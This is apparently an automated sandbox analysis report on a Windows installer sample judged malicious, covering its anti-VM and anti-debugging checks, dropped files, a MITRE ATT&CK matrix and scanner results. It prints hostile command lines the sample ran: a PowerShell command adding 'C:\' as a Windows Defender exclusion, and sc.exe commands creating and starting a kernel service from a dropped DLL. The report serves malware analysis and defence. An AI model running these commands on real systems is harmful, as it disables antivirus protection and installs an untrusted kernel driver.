Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6104Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3549Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpWindow / User API: threadDelayed 647Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpWindow / User API: threadDelayed 603Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpWindow / User API: threadDelayed 561Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9BB430 FindFirstFileA,FindClose,FindClose,6_2_6C9BB430
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00DA6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00DA7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DA9C60 GetSystemInfo,10_2_00DA9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C843886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6C843886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9D06F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C9D06F1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00E257D0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9CF6ED mov eax, dword ptr fs:[00000030h]6_2_6C9CF6ED
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9DA2A5 mov eax, dword ptr fs:[00000030h]6_2_6C9DA2A5
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9DA2D6 mov eax, dword ptr fs:[00000030h]6_2_6C9DA2D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9D06F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C9D06F1
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpCode function: 6_2_6C9C922D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C9C922D

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E40320 cpuid 10_2_00E40320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00DAAB2A GetSystemTimeAsFileTime,10_2_00DAAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E40090 GetVersion,10_2_00E40090
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2242652652.00000000016F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
Windows Service		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution		1
DLL Side-Loading		1
Windows Service		1
Disable or Modify Tools		LSASS Memory43
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API		Logon Script (Windows)111
Process Injection		231
Virtualization/Sandbox Evasion		Security Account Manager231
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Access Token Manipulation		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials2
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing		Proc Filesystem25
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580396 Sample: #U5b89#U88c5#U52a9#U624b2.0.7.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 88 97 Multi AV Scanner detection for dropped file 2->97 99 Found driver which could be used to inject code into processes 2->99 101 PE file contains section with special chars 2->101 103 2 other signatures 2->103 11 #U5b89#U88c5#U52a9#U624b2.0.7.exe 2 2->11         started        14 cmd.exe 2->14         started        16 cmd.exe 2->16         started        18 30 other processes 2->18 process3 file4 95 C:\...\#U5b89#U88c5#U52a9#U624b2.0.7.tmp, PE32 11->95 dropped 20 #U5b89#U88c5#U52a9#U624b2.0.7.tmp 3 5 11->20         started        24 sc.exe 1 14->24         started        26 sc.exe 1 16->26         started        28 sc.exe 1 18->28         started        30 sc.exe 1 18->30         started        32 sc.exe 1 18->32         started        34 26 other processes 18->34 process5 file6 81 C:\Users\user\AppData\Local\...\update.vac, PE32 20->81 dropped 83 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 20->83 dropped 105 Adds a directory exclusion to Windows Defender 20->105 36 #U5b89#U88c5#U52a9#U624b2.0.7.exe 2 20->36         started        39 powershell.exe 23 20->39         started        42 conhost.exe 24->42         started        44 conhost.exe 26->44         started        46 conhost.exe 28->46         started        48 conhost.exe 30->48         started        50 conhost.exe 32->50         started        52 conhost.exe 34->52         started        54 25 other processes 34->54 signatures7 process8 file9 85 C:\...\#U5b89#U88c5#U52a9#U624b2.0.7.tmp, PE32 36->85 dropped 56 #U5b89#U88c5#U52a9#U624b2.0.7.tmp 4 16 36->56         started        107 Loading BitLocker PowerShell Module 39->107 60 conhost.exe 39->60         started        62 WmiPrvSE.exe 39->62         started        signatures10 process11 file12 87 C:\Users\user\AppData\Local\...\update.vac, PE32 56->87 dropped 89 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 56->89 dropped 91 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 56->91 dropped 93 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 56->93 dropped 109 Query firmware table information (likely to detect VMs) 56->109 111 Protects its processes via BreakOnTermination flag 56->111 113 Hides threads from debuggers 56->113 115 Contains functionality to hide a thread from the debugger 56->115 64 7zr.exe 2 56->64         started        67 cmd.exe 56->67         started        69 7zr.exe 7 56->69         started        signatures13 process14 file15 79 C:\Program Files (x86)\...\tProtect.dll, PE32+ 64->79 dropped 71 conhost.exe 64->71         started        73 sc.exe 1 67->73         started        75 conhost.exe 69->75         started        process16 process17 77 conhost.exe 73->77         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b2.0.7.exe0%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc24%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\update.vac24%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\update.vac24%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b2.0.7.exefalse
    		high
    https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065280017.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065641088.000000007ECFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000000.2067287826.0000000000A21000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000000.2087886960.000000000117D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.drfalse
      		high
      https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065280017.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065641088.000000007ECFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000000.2067287826.0000000000A21000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000000.2087886960.000000000117D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.drfalse
        		high

        World Map of Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580396
        Start date and time:2024-12-24 13:02:12 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 51s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:110
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:#U5b89#U88c5#U52a9#U624b2.0.7.exe
        renamed because original name is a hash value
        Original Sample Name:2.0.7.exe
        Detection:MAL
